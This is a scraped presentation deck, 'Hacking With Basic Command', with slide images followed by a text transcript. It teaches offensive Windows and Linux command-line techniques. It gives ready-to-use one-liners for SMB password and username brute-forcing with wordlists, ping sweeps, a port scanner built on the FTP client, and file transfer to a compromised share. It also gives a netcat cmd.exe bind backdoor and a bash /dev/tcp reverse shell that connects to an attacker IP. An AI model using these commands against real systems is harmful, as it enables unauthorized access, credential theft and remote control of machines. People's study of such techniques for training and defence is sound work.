![Hacking With Basic Command
Presented :
Dedi Dwianto
[theday@echo.or.id]](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-1-2048.jpg)
![Setting up smb sessions
⢠Set up session with a target
⢠Mount a Share on a target :
C:> net use [targetIP] [password] /u:[user]
C:> net use [targetIP][sharename] [password] /u:[user]](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-6-2048.jpg)
![Dropping smb sessions
⢠Windows only accept one username at a time only
⢠Drop SMB Session
⢠Drop All SMB Session
C:> net use [TargetIP] /del
C:> net use * /del](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-7-2048.jpg)
![FOR /L Loops
⢠FOR /L loops are counters :
⢠Simple Counter
c:> for /L %i in (1,1,255) do echo %i
c:> for /L %i in ([start],[step],[stop]) do [command]](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-9-2048.jpg)
![FOR /L Loops
⢠Run Multiple Command
[command1] & [command2]
⢠Run Command1 and Run Command2 if Command1 run without
error
[command1] && [command2]
c:> for /L %i in (1,1,10) do echo %i & ping ân 5 127.0.0.1
C:> for /L %i in (1,1,10) do echo %ii && ping ân 5 127.0.0.1](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-10-2048.jpg)
![FOR /L Loops : Handling Output
⢠Redirect to nul : > null
⢠Redirect to file : >filename
⢠Output find string : | find â[string name]â
⢠Redirect Error Message : [command] 2>null or [command] 2>>file
c:> for /L %i in (1,1,10) do echo %i & ping ân 5 127.0.0.1 > nul
C:> for /L %i in (1,1,10) do echo %i && ping ân 5 127.0.0.1 > result.txt](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-11-2048.jpg)
![FOR /F Loops
⢠Loop through text
⢠etc can be :
â The contents
â String
â Command
FOR /F ["options"] %parameter IN (âetc") DO command](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-13-2048.jpg)
![Password Guessing with FOR /F
⢠Password Guessing via SMB
⢠You know Username
⢠Password list from John the Ripperâs password.lst
C:>for /F %i in (password.lst) do @echo %i & @net use [targetIP] %i /u:[Username]
2>nul && pause && echo [Username] :%i >> done.txt](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-14-2048.jpg)
![Username & Password
Guessing
with FOR /F⢠Guees each password for each username
⢠We need 2 file username & password list
⢠2 variable %u and %p for username & password
⢠Use net use for try SMB session
⢠Drop SMB if success Login
C:>for /F %u in (user.txt) do @(for /F %p in (password.txt) do @echo %u : %p &
@net use [targetIP] %p /u:%u 2>nul && echo %u : %p >> done.txt &&
net use [targetIP] /del)](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-16-2048.jpg)
![Windows Port Scanner With FTP Client
⢠Windows FTP Client C:> ftp [IpAddress]
⢠Using âs option FTP for ready from file : c:>ftp âs:[filename]
⢠Weâll write a loop that generate FTP command file and invoke FTP
to run from that command
⢠Store the result
for/L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt
& echo open [IPAddress] %i > ftp.txt & echo quit >> ftp.txt
& ftp -s:ftp.txt 2>>ports.txt](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-18-2048.jpg)
![Windows Command Line File Transfer
⢠Use Windows File & Printer Sharing
⢠Redirect to Share folder :
⢠Login to SMB Session take from Password Guessing
C:>type [filename] > [IPtarget][share][filename]
C:> net use [IPTarget] [password] /u:[username]](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-20-2048.jpg)
![Netcat : Windows Backdoor
nc -l -p [port] -e âcmd.exeâ](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-24-2048.jpg)
![Linux Command Line
Hacking⢠/dev/tcp/
⢠Open Connection to Other Machines
⢠Like Connect Back Shell
⢠/dev/tcp/[IPAddress]/[Port]](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-25-2048.jpg)
![Backdooring via /dev/tcp
/bin/bash -i > /dev/tcp/[IP Attacker]/[port] 0<&1 2>&1
Firewall
Deny
Incoming
/bin/bash -i > /dev/tcp/[ip]/[port] 0<&1
2>&1nc -l -p 80
Type Command Command Execute](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/75/amrapali-builders-hacking-with-basic-command-pdf-26-2048.jpg)
More Related Content
Similar to amrapali builders @@ hacking with basic command.pdf
amrapali builders @@ hacking with basic command.pdf
- 1. Hacking With BasicCommand Presented : Dedi Dwianto [[email protected]]
- 2. Contents ⢠Scenario ⢠WindowsCommand-Line Hacking ⢠Netcat ⢠Linux Commnad-Line Hacking ⢠Q&A
- 3.
- 4. Windows Command ⢠FindingOthers Machines ⢠SMB Sessions ⢠FOR Loops ⢠Password Guessing ⢠Port Scanner ⢠File Transfer
- 5. Finding other machines â˘C:>ipconfig /displaydns ⢠C:>arp âa
- 6. Setting up smbsessions ⢠Set up session with a target ⢠Mount a Share on a target : C:> net use [targetIP] [password] /u:[user] C:> net use [targetIP][sharename] [password] /u:[user]
- 7. Dropping smb sessions â˘Windows only accept one username at a time only ⢠Drop SMB Session ⢠Drop All SMB Session C:> net use [TargetIP] /del C:> net use * /del
- 8. FOR Loops ⢠CommonOption for Hacking ⢠FOR /L : Loop through a range of numbers ⢠FOR /F: Loop through items in a text file
- 9. FOR /L Loops â˘FOR /L loops are counters : ⢠Simple Counter c:> for /L %i in (1,1,255) do echo %i c:> for /L %i in ([start],[step],[stop]) do [command]
- 10. FOR /L Loops â˘Run Multiple Command [command1] & [command2] ⢠Run Command1 and Run Command2 if Command1 run without error [command1] && [command2] c:> for /L %i in (1,1,10) do echo %i & ping ân 5 127.0.0.1 C:> for /L %i in (1,1,10) do echo %ii && ping ân 5 127.0.0.1
- 11. FOR /L Loops: Handling Output ⢠Redirect to nul : > null ⢠Redirect to file : >filename ⢠Output find string : | find â[string name]â ⢠Redirect Error Message : [command] 2>null or [command] 2>>file c:> for /L %i in (1,1,10) do echo %i & ping ân 5 127.0.0.1 > nul C:> for /L %i in (1,1,10) do echo %i && ping ân 5 127.0.0.1 > result.txt
- 12. Simple Sweep Ping C:>for /L %i in (1,1,10) do echo %i & ping ân 5 192.168.114.%i | find âReplyâ
- 13. FOR /F Loops â˘Loop through text ⢠etc can be : â The contents â String â Command FOR /F ["options"] %parameter IN (âetc") DO command
- 14. Password Guessing withFOR /F ⢠Password Guessing via SMB ⢠You know Username ⢠Password list from John the Ripperâs password.lst C:>for /F %i in (password.lst) do @echo %i & @net use [targetIP] %i /u:[Username] 2>nul && pause && echo [Username] :%i >> done.txt
- 16. Username & Password Guessing withFOR /F⢠Guees each password for each username ⢠We need 2 file username & password list ⢠2 variable %u and %p for username & password ⢠Use net use for try SMB session ⢠Drop SMB if success Login C:>for /F %u in (user.txt) do @(for /F %p in (password.txt) do @echo %u : %p & @net use [targetIP] %p /u:%u 2>nul && echo %u : %p >> done.txt && net use [targetIP] /del)
- 18. Windows Port ScannerWith FTP Client ⢠Windows FTP Client C:> ftp [IpAddress] ⢠Using âs option FTP for ready from file : c:>ftp âs:[filename] ⢠Weâll write a loop that generate FTP command file and invoke FTP to run from that command ⢠Store the result for/L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IPAddress] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
- 20. Windows Command LineFile Transfer ⢠Use Windows File & Printer Sharing ⢠Redirect to Share folder : ⢠Login to SMB Session take from Password Guessing C:>type [filename] > [IPtarget][share][filename] C:> net use [IPTarget] [password] /u:[username]
- 22. Netcat ⢠TCP/UDP NetworkWidget ⢠Standard In and Send It across the network ⢠Receives data from network and put it to standard out NETCAT Std In Std Out Send Packets Receives Packets Std Error SYSTEM NETWORK
- 23. Netcat Functions ⢠SendFile ⢠Port Scan ⢠Backdoor Shell Access ⢠Connect to Open Port ⢠Simple Chats ⢠Replay Data in TCP/UDP Packets ⢠Etc âŚ
- 24. Netcat : WindowsBackdoor nc -l -p [port] -e âcmd.exeâ
- 25. Linux Command Line Hackingâ˘/dev/tcp/ ⢠Open Connection to Other Machines ⢠Like Connect Back Shell ⢠/dev/tcp/[IPAddress]/[Port]
- 26. Backdooring via /dev/tcp /bin/bash-i > /dev/tcp/[IP Attacker]/[port] 0<&1 2>&1 Firewall Deny Incoming /bin/bash -i > /dev/tcp/[ip]/[port] 0<&1 2>&1nc -l -p 80 Type Command Command Execute
- 28.